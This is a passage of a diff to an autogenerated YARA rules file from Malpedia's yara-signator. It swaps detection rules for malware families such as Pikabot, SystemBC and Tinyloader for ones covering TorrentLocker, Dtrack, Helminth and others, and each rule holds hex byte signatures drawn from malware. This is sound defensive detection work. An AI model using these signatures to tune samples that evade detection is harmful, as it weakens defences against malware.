-		$sequence_2 = { 33d2 85c0 750a b901090080 e9???????? }
-		$sequence_3 = { 894718 0f84740b0000 83f803 0f84bb0e0000 83f801 }
-		$sequence_4 = { 750c 807b0208 7506 807b030d 7449 }
-		$sequence_5 = { b9020e0080 e8???????? b916000000 e8???????? }
-		$sequence_6 = { ffd0 8905???????? bb52000080 eb03 }
-		$sequence_7 = { 33d2 b907080080 e8???????? 32db eb24 33d2 }
-		$sequence_8 = { 8b4d50 85c9 7507 b9070e0080 eb17 }
-		$sequence_9 = { 75d0 85ff 745d 83ff04 }
+		$sequence_0 = { 418bcd e8???????? 807c24700a 4c8d15fe0b0400 74bb 41b80d000000 448803 }
+		$sequence_1 = { 41c6460642 41c6460756 41c6460855 41c646096b 41c6460a77 41c6460b39 41c6460c49 }
+		$sequence_2 = { c705????????090400c0 c705????????01000000 c705????????01000000 b808000000 486bc000 488d0d3a7e0300 48c7040102000000 }
+		$sequence_3 = { e8???????? 488945e0 488955e8 488d5de0 48899dd0feffff 488d3d03120900 48897df8 }
+		$sequence_4 = { 488d8db0fcffff e8???????? 488d3d4f520900 4889bdf8fcffff 48c785f0fcffff0e000000 488d8df0fcffff e8???????? }
+		$sequence_5 = { 48bae0b1ffff0f270000 488d4df0 e8???????? 48bae0b1ffff0f270000 488d4df0 e8???????? 85c0 }
+		$sequence_6 = { 894d10 895518 44894520 4d89cd 488b5d30 488d35fae40400 488dbd10ffffff }
+		$sequence_7 = { 488b5208 4889d3 09c3 747b 48898570ffffff 48899578ffffff 488d3d19440a00 }
+		$sequence_8 = { e9???????? 48897da0 4c8d150ab70600 4c8955d8 48c745d00f000000 4c8d4dd0 440fbf06 }
+		$sequence_9 = { e8???????? 4c8d0dee830700 4c898d78fcffff 48c78570fcffff0e000000 488d8d70fcffff e8???????? 488d05c9830700 }
 
 	condition:
-		7 of them and filesize < 802816
+		7 of them and filesize < 1955840
 }
-rule MALPEDIA_Win_Dadstache_Auto : FILE
+rule MALPEDIA_Win_Mindware_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "83ac24de-2d4c-56ca-a52b-b61e76854726"
+		id = "47e4869b-800b-5557-a4d9-867ae32fc71e"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dadstache_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mindware"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mindware_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "25ccaa507f10be35b704008ec9887b279a6b66e6fbc6fcb0d9200b947fa69258"
+		logic_hash = "cdf7a7da50c91df9825bab58a751a2b3b443f392a26a7c4ddad4a0902a0837ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121794,40 +122139,34 @@ rule MALPEDIA_Win_Dadstache_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a3???????? c605????????03 ff15???????? 68c8000000 }
-		$sequence_1 = { e9???????? 80f902 0f85f8000000 8b830c020000 }
-		$sequence_2 = { 8bd8 83c408 85db 0f858e000000 6aff ff35???????? }
-		$sequence_3 = { 85c0 7409 50 ffd6 8b15???????? 85d2 }
-		$sequence_4 = { 83c710 8b45f0 8b5dec c1e810 0fb6c0 c1e918 8b55e8 }
-		$sequence_5 = { 68c8000000 ff15???????? 8b45ec 8d5302 46 ebd7 6a64 }
-		$sequence_6 = { 6a00 83e103 8d85fcfdffff 6a00 }
-		$sequence_7 = { ff35???????? ff15???????? 85c0 0f8461ffffff 8b45fc 3dc8000000 751c }
-		$sequence_8 = { 50 57 c745c075616c41 c745c46c6c6f63 c645c800 ffd3 }
-		$sequence_9 = { 660f6e8838ffffff 660f76f5 660f62d8 0f28e6 660f62ca }
-		$sequence_10 = { 0f8409010000 85c0 0f8401010000 6a20 }
-		$sequence_11 = { 57 c745e075616c46 c745e472656500 ffd3 837e0400 894610 7438 }
-		$sequence_12 = { 0f28e6 660f6e5084 660fdbfe 660f62d9 0f57f6 }
-		$sequence_13 = { 85f6 7437 837e0c00 7431 85d2 742d }
-		$sequence_14 = { 83c060 660f6e5024 8d8040010000 660f6e80bcfeffff 0f57f6 660f6e8894feffff }
-		$sequence_15 = { 74d5 ff7654 8b55e8 8bcf e8???????? 8b4dfc }
+		$sequence_0 = { 85c0 750a 6a64 ff15???????? ebe3 8be5 }
+		$sequence_1 = { 33d1 8b4dec c1e908 0fb6c9 c1e208 0fb689c0b74400 }
+		$sequence_2 = { c78594f2ffff44e44300 c78598f2ffff4ce44300 c7859cf2ffff54e44300 c785a0f2ffff64e44300 }
+		$sequence_3 = { c78578ffffff00001000 c7857cffffff00000000 eb12 8b55d0 899578ffffff 8b45d4 89857cffffff }
+		$sequence_4 = { c78550f4ffffb4e84300 c78554f4ffffbce84300 c78558f4ffffc4e84300 c7855cf4ffffcce84300 c78560f4ffffd4e84300 c78564f4ffffdce84300 c78568f4ffffe4e84300 }
+		$sequence_5 = { 8955d4 8955d8 8b4508 83c02c 50 ff15???????? }
+		$sequence_6 = { c1e104 034c2414 8b01 8907 8b4104 }
+		$sequence_7 = { 895824 0fb689f0d84400 894d10 0fb6ca 0fb689f0d84400 c1e108 314d10 }
+		$sequence_8 = { 8bf2 03f9 c1ce0d 03b8e83f4400 03bc05ccfeffff 037df4 }
+		$sequence_9 = { 8945fc c745f001000000 837dfc00 7541 c745ec00000000 c745f800000000 8b4d08 }
 
 	condition:
-		7 of them and filesize < 580608
+		7 of them and filesize < 661504
 }
-rule MALPEDIA_Win_Badcall_Auto : FILE
+rule MALPEDIA_Win_Sfile_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6dc89352-23be-508c-aee9-54c70773ba33"
+		id = "75155690-b8c4-56cb-a521-79ec01661bb7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.badcall_auto.yar#L1-L232"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sfile"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sfile_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "f469c22ea661fc33aaf4e709b2c352b5b8bb3d75d2b5706e6fcd20955f630b93"
+		logic_hash = "f10b431d07234874e195b1e87ba788840300f4cb0ead711972642011468c2ef8"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -121839,46 +122178,32 @@ rule MALPEDIA_Win_Badcall_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 85c0 75d3 5f 33c0 }
-		$sequence_1 = { 6a06 6a01 6a02 c744241801000000 8944241c }
-		$sequence_2 = { 89442412 8bf1 6685ff 66c74424080000 6689442416 746d }
-		$sequence_3 = { 8b44241c 6685c0 7442 33d2 50 }
-		$sequence_4 = { 83f8ff 7453 8d4c2404 6a04 }
-		$sequence_5 = { 50 8954240a 66c74424080200 8954240e 894c240c 89542412 }
-		$sequence_6 = { 8d7c240d c644240c00 f3ab 66ab 8d4c242c }
-		$sequence_7 = { 8a4c2408 8a542420 3aca 7509 66817c24090103 7402 33c0 }
-		$sequence_8 = { 8be8 bfffff0000 83c404 3bef }
-		$sequence_9 = { c644242bb3 896c2418 ffd7 8bd8 8d442414 }
-		$sequence_10 = { 57 8b7c241c 83ff01 741b 83ff02 }
-		$sequence_11 = { 2bf9 895500 8d5504 8bc1 8bf7 }
-		$sequence_12 = { 55 ff15???????? 8bf8 83ffff 7512 5f }
-		$sequence_13 = { 81c408020000 c3 8d842414010000 6803010000 50 }
-		$sequence_14 = { 2bd1 8b4c2418 03c2 51 894608 }
-		$sequence_15 = { 895604 8b16 8bc7 2bc2 8b542418 }
-		$sequence_16 = { 0f8484000000 85c0 7473 8d442418 50 56 ff15???????? }
-		$sequence_17 = { 8d442410 6a04 50 53 e8???????? }
-		$sequence_18 = { 6a01 53 6689842486000000 ff15???????? }
-		$sequence_19 = { c3 8bc8 83e01f c1f905 8d04c0 8b0c8de0ad0110 }
-		$sequence_20 = { 83c102 03c7 4a 75f3 8b542440 }
-		$sequence_21 = { 7520 42 3bd1 7d1f 8a441410 }
-		$sequence_22 = { ffd6 8d7c240c 83c9ff 33c0 33d2 f2ae }
-		$sequence_23 = { 83e01f c1f905 8d34c0 8b048de0ad0110 }
+		$sequence_0 = { 8945f4 8b45f4 8945fc 8b4dfc c7412800000000 8b55fc c7422000000000 }
+		$sequence_1 = { 8b888c050000 51 e8???????? 8b55f8 8b4a14 e8???????? 8945ec }
+		$sequence_2 = { 8b55fc 894210 894a14 8b4508 833800 7413 8b4d08 }
+		$sequence_3 = { ff15???????? 8b45ec 50 8b4df8 }
+		$sequence_4 = { e8???????? 8b4df8 83795800 740d 8b55f8 }
+		$sequence_5 = { e8???????? 83c404 8b4510 8b4858 894df8 }
+		$sequence_6 = { 33c0 e9???????? eb21 837d1003 751b }
+		$sequence_7 = { 8b45e8 8b4df8 8b511c 8910 }
+		$sequence_8 = { 8b5158 52 e8???????? 83c404 8b4510 }
+		$sequence_9 = { 8b4204 ffd0 8b4df8 c7412000000000 833d????????ff }
 
 	condition:
-		7 of them and filesize < 483328
+		7 of them and filesize < 588800
 }
-rule MALPEDIA_Win_Systembc_Auto : FILE
+rule MALPEDIA_Win_Torrentlocker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "78762f50-0312-5144-8487-9132a843d75d"
+		id = "78a2f41d-b3cc-50c3-94fa-009892ee7a43"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.systembc_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.torrentlocker_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "0c55a2c050a3bb97541957e7a554780d9460670263a6f5688965634c91b9bb06"
+		logic_hash = "3dd062623227a3c969fbf6874bc33a690192fa1b5ef820c50984975d7d603139"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121892,34 +122217,40 @@ rule MALPEDIA_Win_Systembc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bec 53 57 56 8b7d10 }
-		$sequence_1 = { 7507 66837fff00 740d 837d1000 7409 66837aff00 7502 }
-		$sequence_2 = { 8b4d0c 837d0c00 750b ff7508 e8???????? }
-		$sequence_3 = { 837d0cfe 751c 837d1000 7507 66837fff00 }
-		$sequence_4 = { 50 8b45f8 8b08 50 8b4178 }
-		$sequence_5 = { 6a00 8d85fcfbffff 50 8b45f8 8b08 }
-		$sequence_6 = { 740d 837d1000 7409 66837aff00 7502 eb2e }
-		$sequence_7 = { 837d0cfe 751c 837d1000 7507 66837fff00 740d 837d1000 }
-		$sequence_8 = { c9 c21400 55 8bec 53 57 56 }
-		$sequence_9 = { 8b450c ab 8b4514 ab }
+		$sequence_0 = { c3 83f801 7405 83f802 }
+		$sequence_1 = { 85c0 753c 68???????? b8???????? bb???????? e8???????? }
+		$sequence_2 = { 750b 68???????? ff15???????? 8bc3 }
+		$sequence_3 = { 8b0d???????? 50 6a00 51 ff15???????? 8bf0 }
+		$sequence_4 = { 6a00 68???????? ffd6 83f801 7502 5e c3 }
+		$sequence_5 = { 6a02 e8???????? 83c430 85c0 }
+		$sequence_6 = { 8bc6 5e 5f c3 be02000000 }
+		$sequence_7 = { 68???????? ffd6 85c0 751f ff15???????? 3d16000980 753d }
+		$sequence_8 = { 7415 50 a1???????? 56 }
+		$sequence_9 = { 83ec0c 56 8b35???????? 57 6a14 6a08 50 }
+		$sequence_10 = { 741d 8b15???????? 50 6a00 52 ff15???????? 8bc7 }
+		$sequence_11 = { 7526 68400000f0 50 6a00 }
+		$sequence_12 = { 50 ff15???????? 85c0 8d4601 7502 8bc6 5e }
+		$sequence_13 = { 7412 83c8ff 5f a3???????? 89460c }
+		$sequence_14 = { 68???????? ff15???????? 85c0 7510 6a78 50 }
+		$sequence_15 = { 6a78 50 68???????? e8???????? }
 
 	condition:
-		7 of them and filesize < 75776
+		7 of them and filesize < 933888
 }
-rule MALPEDIA_Win_Pikabot_Auto : FILE
+rule MALPEDIA_Win_Miuref_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ca491d89-20a6-5b52-8d28-6fe7d217ba54"
+		id = "4c12abfd-56eb-5794-a878-e360bcdd710f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pikabot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pikabot_auto.yar#L1-L270"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.miuref_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "c58243245af92019919e67e8e639db22bdc3515d5ca76925cfc701e773724623"
+		logic_hash = "5ba2d5449e6730857e7b4a98904adc38cf054939f52a1a5bc78d4b800b88b99f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -121931,51 +122262,32 @@ rule MALPEDIA_Win_Pikabot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ebd3 8b4508 c9 c3 55 8bec }
-		$sequence_1 = { 8bec 83ec0c 8b4508 8945fc 8b450c 8945f8 8b4510 }
-		$sequence_2 = { 8b45f8 40 8945f8 ebd3 8b4508 }
-		$sequence_3 = { 8b4df8 8a09 8808 8b45fc 40 8945fc 8b45f8 }
-		$sequence_4 = { 8b4510 48 894510 837df400 741a 8b45fc 8b4df8 }
-		$sequence_5 = { 7ce9 8b4214 2b420c 5f }
-		$sequence_6 = { 8a1c08 8d4320 0fb6c8 8d53bf 80fa19 0fb6c3 }
-		$sequence_7 = { 3bc7 72d5 5b 5f 8bc6 }
-		$sequence_8 = { 57 8bfa 85c9 7436 85ff }
-		$sequence_9 = { 6a08 0f43c8 33c1 83fa40 }
-		$sequence_10 = { 8801 41 8a040a 84c0 75f6 c60100 8bc6 }
-		$sequence_11 = { 8b0cba 03ce e8???????? 8bd0 }
-		$sequence_12 = { 53 56 8b35???????? b84d5a0000 57 8955fc 663906 }
-		$sequence_13 = { e8???????? 8bd0 e8???????? 3b45fc }
-		$sequence_14 = { 0fabd0 83fa20 6a08 0f43c8 }
-		$sequence_15 = { 56 8bf1 85c9 7419 85d2 }
-		$sequence_16 = { 0345f8 03c8 0fb6c9 894df8 }
-		$sequence_17 = { 0fb6d1 03c2 0fb6c0 8945f0 }
-		$sequence_18 = { 40 3d00010000 72f1 8bf2 }
-		$sequence_19 = { 81f900010000 72f0 8bf0 33d2 }
-		$sequence_20 = { 3d00010000 72f1 8b35???????? 8bf9 }
-		$sequence_21 = { 8b01 0d20202020 3d6e74646c 750f }
-		$sequence_22 = { 8d4400ff 5d c3 55 89e5 57 56 }
-		$sequence_23 = { 893c24 e8???????? 31c9 894c2410 }
-		$sequence_24 = { a1???????? 8b00 890424 e8???????? a1???????? 8b9060010000 89542404 }
-		$sequence_25 = { 890424 e8???????? 8b4308 29f0 }
-		$sequence_26 = { c744240448020000 c7042440000000 a1???????? ff5050 31c9 52 }
-		$sequence_27 = { 893c24 a1???????? ff90ec000000 52 52 85c0 }
-		$sequence_28 = { 89442408 31c0 89442404 890424 }
+		$sequence_0 = { 7408 3bf9 7404 3bf8 7510 }
+		$sequence_1 = { ff36 e8???????? 53 8945e0 e8???????? 59 }
+		$sequence_2 = { 895df0 895df4 895de8 e8???????? 59 6a15 83ec10 }
+		$sequence_3 = { 53 ff75f4 e8???????? 59 59 3945f8 0f86e7feffff }
+		$sequence_4 = { 83c40c 68000000f0 6a01 56 8945f4 }
+		$sequence_5 = { 894dd4 8b4804 53 2bca 68???????? 51 52 }
+		$sequence_6 = { a1???????? c780140100006d455c02 a1???????? c78018010000a58f63dc }
+		$sequence_7 = { 5f 53 e8???????? a1???????? 59 5b c9 }
+		$sequence_8 = { 50 56 ff750c 57 ff15???????? 57 ff15???????? }
+		$sequence_9 = { 59 85c0 7512 3bdd 7e03 4b eb03 }
 
 	condition:
-		7 of them and filesize < 1717248
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Casper_Auto : FILE
+rule MALPEDIA_Win_Helminth_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e6e721c8-dd07-5896-b009-f293b597cc79"
+		id = "379c192f-5a15-5f3b-ad5b-fc2b330bc750"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.casper_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.helminth_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "44b510f3119535b0c0c8064d1c39533cfa6df7cf823ef2fa1ba3402aaa98bcc5"
+		logic_hash = "274e3eea90d2e30111a5a8cd56771457195fff91f933a3b2952878df64a83186"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -121989,32 +122301,37 @@ rule MALPEDIA_Win_Casper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d4d10 51 57 8d4d08 51 56 ff7514 }
-		$sequence_1 = { 8945f4 885dfc 895df8 e8???????? 8a07 3c41 7c09 }
-		$sequence_2 = { 6a2c e8???????? 59 3bc3 7409 8bf0 e8???????? }
-		$sequence_3 = { ff7508 e8???????? 85c0 7431 391e 762d 8d7e04 }
-		$sequence_4 = { 13f9 e8???????? 3bd7 770f 7205 3b45e4 7308 }
-		$sequence_5 = { e8???????? 59 3bf8 72e5 6a3d 8bc3 e8???????? }
-		$sequence_6 = { 8a8040a14200 8845f4 ff75f4 8bc6 e8???????? 0fb64701 0fb64f02 }
-		$sequence_7 = { 50 6a00 ff75fc e8???????? 85c0 740a ff75fc }
-		$sequence_8 = { 8d143b 8945fc 8945f8 3bd1 7746 3bc8 7303 }
-		$sequence_9 = { 6a28 c6431001 e8???????? 8bf8 33c0 59 3bf8 }
+		$sequence_0 = { a1???????? 68e8030000 8907 e8???????? }
+		$sequence_1 = { 83e61f c1e606 8b0cbd70750110 f6440e0401 743d }
+		$sequence_2 = { 6685c0 75f4 a1???????? 8b15???????? }
+		$sequence_3 = { 6689440afe 6685c0 75f0 6a00 6880000000 6a04 6a00 }
+		$sequence_4 = { 33c0 5d c21000 803d????????00 56 8b7508 }
+		$sequence_5 = { 75f0 8bcf e8???????? e9???????? ffb5f4fdffff 8b35???????? }
+		$sequence_6 = { e8???????? 8bd8 83e31f 59 c1e306 031cb570750110 59 }
+		$sequence_7 = { 55 8bec 8b4d08 33c0 3b0cc550070110 740a 40 }
+		$sequence_8 = { be???????? 89bd08fcffff 8bd6 e8???????? }
+		$sequence_9 = { 2bf1 33c9 d1fe 2bf7 8d4601 }
+		$sequence_10 = { 83c102 663b45f8 75f4 2b4d08 d1f9 }
+		$sequence_11 = { 66890c16 8d5202 6685c9 75f1 8bcf e8???????? }
+		$sequence_12 = { a3???????? c3 33c0 50 6a01 }
+		$sequence_13 = { 8bd6 8907 668b02 83c202 663bc1 75f5 }
+		$sequence_14 = { 03c9 51 53 56 8934bd20f04100 }
 
 	condition:
-		7 of them and filesize < 434176
+		7 of them and filesize < 479232
 }
-rule MALPEDIA_Win_Downdelph_Auto : FILE
+rule MALPEDIA_Win_Banatrix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "077f28c1-b20c-5259-b0d0-bf4a01a0c8a9"
+		id = "702dab13-4bb6-5a8c-a445-48baade0f697"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.downdelph_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.banatrix_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "2ab9cad8274dc5f2dae30f8b9a16e2eba342d8e6c2d2e4a6e6e80698c2dff674"
+		logic_hash = "b32ec448caee97c1e074a70cc1c0b66b914a64f46a4b1bc215e4633ee2c8f80d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122028,32 +122345,32 @@ rule MALPEDIA_Win_Downdelph_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45fc e8???????? 8b55dc b8???????? }
-		$sequence_1 = { 42 8b45fc 8b04b8 59 }
-		$sequence_2 = { 8955f8 8945fc 8b45fc e8???????? 8b45f8 e8???????? 8d75bc }
-		$sequence_3 = { 8d45cc ba08000000 e8???????? 8d45f4 }
-		$sequence_4 = { 0345e8 33c9 e8???????? 837df401 7e7f 83450804 ff4df4 }
-		$sequence_5 = { ff35???????? 68???????? 8d45e8 ba03000000 }
-		$sequence_6 = { e8???????? 8945fc 837dfc00 0f8484000000 837dfc01 754b }
-		$sequence_7 = { 33c0 89461c 33c0 894620 33c0 894624 33c0 }
-		$sequence_8 = { 4f 75cd 33c0 5a 59 }
-		$sequence_9 = { ba???????? e8???????? 0f8408030000 8d55e0 }
+		$sequence_0 = { c744240c04000000 c744240800100000 03420c 8955c4 890424 }
+		$sequence_1 = { 56 56 7416 8b03 c745d000000000 0fb75014 8d741018 }
+		$sequence_2 = { c704245a040000 e9???????? c7431001000000 89d8 eb02 }
+		$sequence_3 = { e8???????? 85c0 7505 c60300 eb56 8b5704 }
+		$sequence_4 = { e8???????? 8b4304 85c0 741b c744240800800000 c744240400000000 890424 }
+		$sequence_5 = { eb20 8b7514 39f0 7306 c6040300 }
+		$sequence_6 = { 83c628 8b13 0fb74206 3945d0 7cc8 eb6d 89c7 }
+		$sequence_7 = { e8???????? 89c6 8b45e4 0fb7f6 890424 }
+		$sequence_8 = { 8b5d08 85db 0f849c000000 837b1000 7429 8b13 }
+		$sequence_9 = { 8b450c 5d 8b4004 c3 55 89e5 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Vflooder_Auto : FILE
+rule MALPEDIA_Win_Dtrack_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "76477b84-f3c3-5da1-86fd-c61daea161aa"
+		id = "d8f3c989-b720-5ce0-af93-3bde59a2fdab"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vflooder_auto.yar#L1-L106"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dtrack_auto.yar#L1-L158"
 		license_url = "N/A"
-		logic_hash = "d33638034753d47f1d3c882a126dc14f7048d70033f800573b6ecd2c27103b12"
+		logic_hash = "245b50e28635461a6214109a0274cb2a754a0f5b0ed2d19ab52e688b26ae3fdb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -122067,34 +122384,39 @@ rule MALPEDIA_Win_Vflooder_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 0000 43 7265 61 }
-		$sequence_1 = { b02e f5 f2ae e8???????? }
-		$sequence_2 = { f5 83ef04 f5 ff37 }
-		$sequence_3 = { 3b45f0 60 9c 8d642424 }
-		$sequence_4 = { 9c 60 9c 9c 8d642430 }
-		$sequence_5 = { 0000 43 7265 61 }
-		$sequence_6 = { 60 ff35???????? 8f442438 9c }
-		$sequence_7 = { 9c ff742404 8f4500 9c }
-		$sequence_8 = { 9c ff742404 8d642434 e9???????? }
-		$sequence_9 = { 9c f2ae 9c 9c }
+		$sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 }
+		$sequence_1 = { 8d85e8fbffff 50 e8???????? 83c40c 8d8da8faffff 51 }
+		$sequence_2 = { 8945fc 68???????? e8???????? 83c404 50 8b55fc }
+		$sequence_3 = { 51 e8???????? 83c410 8b558c }
+		$sequence_4 = { 8d95b1faffff 52 e8???????? 83c40c }
+		$sequence_5 = { 8995e8f5ffff 8a85e8f5ffff 888587f6ffff 8b0d???????? 51 }
+		$sequence_6 = { 80bd4af6ffff00 75ae c78544f6ffff00000000 eb0b }
+		$sequence_7 = { 8b954cf6ffff 8a4201 88854af6ffff 8b8d50f6ffff 3a4101 7523 }
+		$sequence_8 = { 898dd0feffff 8b5508 0395d0feffff 0fbe42ff }
+		$sequence_9 = { 3355fc 81e2ff000000 c1e217 0bca 894d14 }
+		$sequence_10 = { 894518 8b5514 8955f8 8b4518 }
+		$sequence_11 = { 33d0 8b4df8 c1e908 234df8 8b45f8 c1e810 23c8 }
+		$sequence_12 = { 7412 837d0800 740c 837d0c00 7406 837d1408 }
+		$sequence_13 = { 0fb602 0fb64df7 33c1 0fb655fc 33c2 8b4d0c }
+		$sequence_14 = { 8b4d0c 034df0 8801 0fb655f7 2355fc }
 
 	condition:
-		7 of them and filesize < 860160
+		7 of them and filesize < 1736704
 }
-rule MALPEDIA_Win_Tinyloader_Auto : FILE
+rule MALPEDIA_Win_Fct_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "895ccf2b-2f25-5f72-b650-0acb543eef11"
+		id = "abc15496-5280-5df8-8374-6c73912930cc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tinyloader_auto.yar#L1-L218"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fct"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fct_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "b908cedbddd27a2a95532a03db9c626e01fc12979ac66acd61b30dfbfa8e2199"
+		logic_hash = "459978803baa25140106f0b9d6fb1e3d43d379e92c63a80a39a4b43b54ebb800"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -122106,44 +122428,32 @@ rule MALPEDIA_Win_Tinyloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f7d2 f7d1 5b 89d0 c1c010 6689c8 90 }
-		$sequence_1 = { 8b1d???????? 90 8998f8070000 90 }
-		$sequence_2 = { 48 83ec20 48 8d0dea0e0000 }
-		$sequence_3 = { 83c008 c70000000000 c7855808000000000000 8b5d00 039d58080000 6a00 }
-		$sequence_4 = { 31c9 ffc9 89ca 31c0 31db }
-		$sequence_5 = { ff15???????? 83f8ff 7405 83f800 7505 e9???????? 018558080000 }
-		$sequence_6 = { 894304 8b5d00 83bb0004000000 750a c783000400000c000000 8b8540050000 }
-		$sequence_7 = { 50 ff95b0020000 83bd4005000001 7502 eb0c c7854005000000000084 }
-		$sequence_8 = { 8b1d???????? 90 895830 90 }
-		$sequence_9 = { fb 6804000073 0d904883c0 0490 }
-		$sequence_10 = { 895830 90 8b1d???????? 90 895838 90 }
-		$sequence_11 = { 68???????? ff15???????? 8d3500304000 89c7 53 }
-		$sequence_12 = { 31c1 31da ffcf 75d4 f7d2 }
-		$sequence_13 = { eb0c c7854005000000000084 eb0a c78540050000000000ba 6a40 6800300000 6800400100 }
-		$sequence_14 = { 48 895838 90 48 89c6 90 }
-		$sequence_15 = { ff33 ff7500 ffb5b8050000 ff15???????? 83f8ff }
